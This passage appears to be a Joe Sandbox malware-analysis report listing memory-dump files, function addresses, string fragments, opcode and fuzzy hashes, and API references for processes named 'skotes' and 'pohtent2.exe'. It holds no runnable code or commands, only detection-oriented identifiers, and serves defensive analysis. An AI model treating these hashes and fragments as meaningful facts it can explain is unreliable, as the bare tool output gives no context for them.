Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 548886458-2046700901
Opcode ID: 591562eb5e40e8e05a9c3289778601861637afb68b27e25a0bad12f2dc797774
Instruction ID: 6d6ffe11be8a4b1ace8c2f2c8a58b350c0e533cc07d7fbfc7cd1cba97992ca6a
Opcode Fuzzy Hash: 591562eb5e40e8e05a9c3289778601861637afb68b27e25a0bad12f2dc797774
Instruction Fuzzy Hash: 95E02B39B0020467CB04F7A5D845D9DBB789E84715710401BE911A3352EB78AA44C6D8

Function 004234CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004234FC

Strings

version, xrefs: 004234E1
pScheduler, xrefs: 004234F4

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: a5483bc7cd2a1e58a27b3e2178f53e3954a11aaa0d61c74f139fe87c3d2ed1cf
Instruction ID: 3122fea0a665ef1032727265859f97669ea40e48c80579a70b610642a631ca87
Opcode Fuzzy Hash: a5483bc7cd2a1e58a27b3e2178f53e3954a11aaa0d61c74f139fe87c3d2ed1cf
Instruction Fuzzy Hash: 28E04F34A40208B6CB26FE56E84BBC977749B1474BF94C157BC11111929BFCA78CCA89

Analysis Process: pohtent2.exePID: 8056, Parent PID: 7856COMMON

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	173
Total number of Limit Nodes:	6

Executed Functions

Function 05F53403 Relevance: 16.1, Strings: 12, Instructions: 1138COMMON

Download Yara Rule

Strings

$^q, xrefs: 05F53977
$^q, xrefs: 05F53D9A
$^q, xrefs: 05F53703
$^q, xrefs: 05F53D41
$^q, xrefs: 05F538C7
$^q, xrefs: 05F536F3
$^q, xrefs: 05F538B7
$^q, xrefs: 05F53D51
4, xrefs: 05F53E45
$^q, xrefs: 05F53967
,bq, xrefs: 05F53F2A
$^q, xrefs: 05F53DAA

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-312445597
Opcode ID: a69ad3ce93e38855e2a75b9ea43d365e11df518e4f847a3bf018195bd5f43e50
Instruction ID: 793aa659d7b4acbd0a47334e94d61f6b8ab95343a2f7fe524c90e7f9d9baee4a
Opcode Fuzzy Hash: a69ad3ce93e38855e2a75b9ea43d365e11df518e4f847a3bf018195bd5f43e50
Instruction Fuzzy Hash: F8B22A35E002189FDB14DFA8C884BADBBB6BF48710F158599EA05AB3A4CB75DC85CF50

Function 05F53797 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

$^q, xrefs: 05F53D9A
$^q, xrefs: 05F53D41
$^q, xrefs: 05F538B7
4, xrefs: 05F53E45
$^q, xrefs: 05F53967
,bq, xrefs: 05F53F2A

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q
API String ID: 0-2546334966
Opcode ID: 4d5752c647bfac5cd4618651cb6026727fbf0075a9fd19597bfadf3ce5c6644d
Instruction ID: 583e127bc077f73a3b7e01327ea7a59280b05b31f24397ed8aa58259ed729ed4
Opcode Fuzzy Hash: 4d5752c647bfac5cd4618651cb6026727fbf0075a9fd19597bfadf3ce5c6644d
Instruction Fuzzy Hash: 45221C35E00218CFDB14DF98C894BADB7B6BF48310F148499EA09AB3A5DB759C85CF50

Function 05F8F2B8 Relevance: 4.4, Strings: 3, Instructions: 633
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fcq, xrefs: 05F8F3C0
8, xrefs: 05F8F3AD
Yuf, xrefs: 05F8F7D3

Memory Dump Source

Source File: 00000007.00000002.2822948926.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f80000_pohtent2.jbxd

Similarity

API ID:
String ID: Yuf$ fcq$8
API String ID: 0-3334793001
Opcode ID: c6e28a4d97647744a22f22c1769d8e2bc650cbdc9d9aea037605d3c607552907
Instruction ID: fd0ea9a016a8b96d98b86b50bced12d9a0863664b5aa3b572652c9e12769fc33
Opcode Fuzzy Hash: c6e28a4d97647744a22f22c1769d8e2bc650cbdc9d9aea037605d3c607552907
Instruction Fuzzy Hash: C162C775E002298FDB65EF68C894AE9BBB1FF89300F5081D9D449AB354DB74AE85CF40

Function 05F56EC8 Relevance: 3.1, Strings: 2, Instructions: 646
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 05F57196
Pl^q, xrefs: 05F570B0

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: Pl^q$$^q
API String ID: 0-2677662154
Opcode ID: 835ceb96615d442c0a0743a1c881eea3cfe0926f0b9e4f4b0e525b9c1f295ac0
Instruction ID: 1540a3975beafe9aee797903f014640af3a02b8d821dfe8c965db3c8b0ae1d06
Opcode Fuzzy Hash: 835ceb96615d442c0a0743a1c881eea3cfe0926f0b9e4f4b0e525b9c1f295ac0
Instruction Fuzzy Hash: CF324C30B012048FCB14EF29C548A6A7BF6FF88760F5584A9EA06CB3A5DB35DC41CB91

Function 05F83698 Relevance: 2.0, Strings: 1, Instructions: 783COMMON

Download Yara Rule

Strings

(bq, xrefs: 05F839A8

Memory Dump Source

Source File: 00000007.00000002.2822948926.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f80000_pohtent2.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: cecae1daf9b5de913f548c2929d619c47b5d43fd8f6d8391496b74e9b0076285
Instruction ID: 721a2fc29e0ec2b2ff0e0b2232bd7ebbd95b5f9c914340614f2f97c8a353a125
Opcode Fuzzy Hash: cecae1daf9b5de913f548c2929d619c47b5d43fd8f6d8391496b74e9b0076285
Instruction Fuzzy Hash: 7A627D74A006168FDB15DF69C898B7EFBF2FF88700F148929E55697391DB34A905CB80

Function 05F747B0 Relevance: 1.6, APIs: 1, Instructions: 83nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 05F74846

Memory Dump Source

Source File: 00000007.00000002.2819701161.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f70000_pohtent2.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 945c9bc6d7b5b14d9d3dc4c60ddf871871d8eca8ba8d452e036cd7d8ad61d7d5
Instruction ID: 720ea7951a45d8fbca8b52a1e00b43d2c7f6af027ea4b190b5b9b850c6351c45
Opcode Fuzzy Hash: 945c9bc6d7b5b14d9d3dc4c60ddf871871d8eca8ba8d452e036cd7d8ad61d7d5
Instruction Fuzzy Hash: BB31A6B9D0125C9FCF10CFA9D984A9EFBF5BB49310F20942AE819B7210C779A945CF94

Function 05F747B8 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 05F74846

Memory Dump Source

Source File: 00000007.00000002.2819701161.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f70000_pohtent2.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f7342a92c80874285f152f52dddb7aae4e8ced89348dfa307df33c729bebfb0c
Instruction ID: 666af91346fc8999d712250edbec4775554004212bd7f47424bedd9e38378bb1
Opcode Fuzzy Hash: f7342a92c80874285f152f52dddb7aae4e8ced89348dfa307df33c729bebfb0c
Instruction Fuzzy Hash: 8031A8B5D012589FCB10CFA9D984A9EFBF5BB49310F20942AE815B7210C779A945CF94

Function 05F89CE8 Relevance: 1.6, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

PH^q, xrefs: 05F8A0B8

Memory Dump Source

Source File: 00000007.00000002.2822948926.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f80000_pohtent2.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 79b8a1331f6a7831009f880f305de7a4565c76ee53659fd64d1772d4c7d8f06f
Instruction ID: c1d9869c9a7764e834af1ce124fe8ff5b2d42f96bc23c028dd9c1798ecdd4c8f
Opcode Fuzzy Hash: 79b8a1331f6a7831009f880f305de7a4565c76ee53659fd64d1772d4c7d8f06f
Instruction Fuzzy Hash: 36D11175E05218CFDB14EFA9D944BBDBBB6FB89300F1080AAD449AB358DB785985CF10

Function 05F89CDB Relevance: 1.6, Strings: 1, Instructions: 302COMMON

Download Yara Rule

Strings

PH^q, xrefs: 05F8A0B8

Memory Dump Source

Source File: 00000007.00000002.2822948926.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f80000_pohtent2.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 22bfac1153322cd2636bb130c3c482f50258b08ad6bd179b94150466e474b8f2
Instruction ID: ebc536c8fa3198217039c33fea2d4cd74a35b3d12a46f20fe8fbc5eeac0b0f6c
Opcode Fuzzy Hash: 22bfac1153322cd2636bb130c3c482f50258b08ad6bd179b94150466e474b8f2
Instruction Fuzzy Hash: 2AD1F275E05218CFDB14EFA9D945BBDBBB2FB89300F1080AAD449AB358DB785985CF10

Function 05F50006 Relevance: 1.5, Strings: 1, Instructions: 274COMMON

Download Yara Rule

Strings

Te^q, xrefs: 05F50405

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 3a7c4a83d5a8ec1ef22ae5299b6bb644425993eebdd5682bd13a7795047fa559
Instruction ID: e2345a57e358fc23b49de7aed7a873e2e8420f07a2f8cdde794c110efe4210c1
Opcode Fuzzy Hash: 3a7c4a83d5a8ec1ef22ae5299b6bb644425993eebdd5682bd13a7795047fa559
Instruction Fuzzy Hash: A7C16A75E05208CFDB14DFA9C848BADBBF6BF49310F1080A9DA09AB355DB785985CF00

Function 05F50040 Relevance: 1.5, Strings: 1, Instructions: 263COMMON

Download Yara Rule

Strings

Te^q, xrefs: 05F50405

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 7ac06673c0db400645a60526204c20fa8349f974a9df6b7bdd8c2b9e979f7438
Instruction ID: 4b6d6483febcb029b806aa0b9fd34c8bdeb66f446646182ffe66aa8821b4933d
Opcode Fuzzy Hash: 7ac06673c0db400645a60526204c20fa8349f974a9df6b7bdd8c2b9e979f7438
Instruction Fuzzy Hash: E3B11875E05208CFDB14DFA9D848BEDBBFABB49310F1090A9DA09AB355DB785985CF00

Function 05F5003F Relevance: 1.5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

Strings

Te^q, xrefs: 05F50405

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 19deac5b2a817b6dec0987bc32c23cf62fe0c836dccfa2db1cd2675c38221f49
Instruction ID: f70f5c0add7fe04690cc9a4b773ccfda22f2460d6aa2f4cdfa47115496387049
Opcode Fuzzy Hash: 19deac5b2a817b6dec0987bc32c23cf62fe0c836dccfa2db1cd2675c38221f49
Instruction Fuzzy Hash: E8B13775E05208CFDB14DFA9C948BADBBF6BF89310F1090A9DA09AB345DB785985CF00

Function 05E37540 Relevance: 1.5, Strings: 1, Instructions: 227COMMON

Download Yara Rule

Strings

Te^q, xrefs: 05E37671

Memory Dump Source

Source File: 00000007.00000002.2799012162.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5e30000_pohtent2.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 1a79577abf736c52f5df83bf033e4eb76ebbb867d6ca602e889f2e5c8eaeebc6
Instruction ID: f9ce0e0b24cfad6603056ce6cb534740cf656ac083ff04c4547c3f728b462d27
Opcode Fuzzy Hash: 1a79577abf736c52f5df83bf033e4eb76ebbb867d6ca602e889f2e5c8eaeebc6
Instruction Fuzzy Hash: 789105B4D05218CFDB14DFA9D889BEDBBF6FB49304F10A069E049AB251EB305A81CF40

Function 05E37531 Relevance: 1.5, Strings: 1, Instructions: 221COMMON

Download Yara Rule

Strings

Te^q, xrefs: 05E37671

Memory Dump Source

Source File: 00000007.00000002.2799012162.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5e30000_pohtent2.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 423b8dcdd8226c4890308c1b8c38c6901d290ac9774912505fe64ae2b6985d57
Instruction ID: ec1a81d26be218bd0167f4148f65f17144de4b0448125b812d7b2409edb3cdfa
Opcode Fuzzy Hash: 423b8dcdd8226c4890308c1b8c38c6901d290ac9774912505fe64ae2b6985d57
Instruction Fuzzy Hash: 1E9106B4D05218CFDB54CFA9D889BADBBF2FB49314F10A06AE049A7355EB705A85CF40

Function 05F5A930 Relevance: 7.7, Strings: 6, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 05F5AA02
4'^q, xrefs: 05F5A9B4
4'^q, xrefs: 05F5AA7A
pbq, xrefs: 05F5AA87
(bq, xrefs: 05F5AAFA
4'^q, xrefs: 05F5A9E4

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
API String ID: 0-723292480
Opcode ID: 0d73e01e4189a2e65c49cb19697cf4a3b6c72fc877a6e84f863430d34db876cf
Instruction ID: 0f4f0fd33a027876711371fb2489f83e6b55f1461278ee943514a73f2fa930ea
Opcode Fuzzy Hash: 0d73e01e4189a2e65c49cb19697cf4a3b6c72fc877a6e84f863430d34db876cf
Instruction Fuzzy Hash: 0451D271A402098FD709EB79C9506AFBBE7BFC8300F10892DC4469B3A9DF75D94687A1

Function 05F59668 Relevance: 4.2, Strings: 3, Instructions: 438
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 05F59BBC
Hbq, xrefs: 05F59B6C
Hbq, xrefs: 05F59B3D

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq
API String ID: 0-2297679979
Opcode ID: 45d4b2be567d9783805713a391489d74826a3c3dccb1cdd998d8ccc36456e9e7
Instruction ID: a98ca549c53b5cd6e9ad539440d8b19ed1e992f26e7d2c290f28a530b3410a67
Opcode Fuzzy Hash: 45d4b2be567d9783805713a391489d74826a3c3dccb1cdd998d8ccc36456e9e7
Instruction Fuzzy Hash: 30024E31A00205CFDB29DFA5C994AAEBBF2FF88310F148529E9469B391DB75EC45CB50

Function 05F5B328 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 05F5B542
4'^q, xrefs: 05F5B6A1
4'^q, xrefs: 05F5B621

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q
API String ID: 0-1196845430
Opcode ID: 58df327847afbb2d2c1d6064e3bd379744caba69520828a4bb4ec131c8beb10c
Instruction ID: 728cf05a22ec019a34cc37a9aa5f93210fb7066235efe47c00040a016b326b5f
Opcode Fuzzy Hash: 58df327847afbb2d2c1d6064e3bd379744caba69520828a4bb4ec131c8beb10c
Instruction Fuzzy Hash: 43F1EC34B10218DFDB14DFA4D998A9DBBB2FF88311F518155E906AB3A5DB35EC42CB80

Function 05C91E48 Relevance: 3.1, Strings: 2, Instructions: 577COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05C925F9
4'^q, xrefs: 05C92609

Memory Dump Source

Source File: 00000007.00000002.2788023388.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c90000_pohtent2.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 9286909c48107ad1a172f5dba7b0e534edcfb1bbf6b3559cf7c9eefea369437e
Instruction ID: d8c4a4ef1aa4d8cc129f3ea902de47926db6201d66de55f58a3165a2ef2d9fe4
Opcode Fuzzy Hash: 9286909c48107ad1a172f5dba7b0e534edcfb1bbf6b3559cf7c9eefea369437e
Instruction Fuzzy Hash: 5D42F678E04209DFDF19CB99D498AFDBBB6FB49300F108819E5526B254CB749E82CF91

Function 05F55BB9 Relevance: 3.0, Strings: 2, Instructions: 484
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 05F55ED3
$^q, xrefs: 05F55EE3

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 52e77e9dbc1244492d6b450e2124596d0eef2f7e0901ddd3349c8a18783bff64
Instruction ID: eb055f58df2bfe1d8f5867087588fa64e104950cdaf0ac16461880e2c114e03b
Opcode Fuzzy Hash: 52e77e9dbc1244492d6b450e2124596d0eef2f7e0901ddd3349c8a18783bff64
Instruction Fuzzy Hash: F0126C32F002198FDB15EFA4C854ABDBBB2BF48710F148415E952AB395DB789D46CF90

Function 05C92970 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 05C92E16
4'^q, xrefs: 05C92E06

Memory Dump Source

Source File: 00000007.00000002.2788023388.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c90000_pohtent2.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: a2db6dbce1ed1a89ced4dd696a265b3938a32533593ee23700b4cdeb162aa7f6
Instruction ID: 5af7471e2b2b08c42afe3e5f1951537cb5ba93528c4efb74480df50c298dc389
Opcode Fuzzy Hash: a2db6dbce1ed1a89ced4dd696a265b3938a32533593ee23700b4cdeb162aa7f6
Instruction Fuzzy Hash: FDF1C378E15218EFDF18DFA9E4986ECBBB2FF89311F204429E446A7250DB355985CF40

Function 05F58D18 Relevance: 2.7, Strings: 2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 05F58F79
(bq, xrefs: 05F58D2C

Memory Dump Source

Source File: 00000007.00000002.2818138320.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5f50000_pohtent2.jbxd

Similarity

API ID:
String ID: (bq$d
API String ID: 0-3334038649
Opcode ID: 990ec28dd459537e56365e3449e253200e4ea9536cc101cf9733328ee8c0dca4
Instruction ID: 2632d2697d0e57e8ff0af55a9154016cc7260f749fc8e3dc2ce762bfeb7eb22f
Opcode Fuzzy Hash: 990ec28dd459537e56365e3449e253200e4ea9536cc101cf9733328ee8c0dca4
Instruction Fuzzy Hash: 12A13934600606CFCB14CF59C480D6AB7F3FF88360B66C959EA5A9B6A6D734F845CB90

Function 05C92648 Relevance: 2.7, Strings: 2, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 05C92938
4'^q, xrefs: 05C92928

Memory Dump Source

Source File: 00000007.00000002.2788023388.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

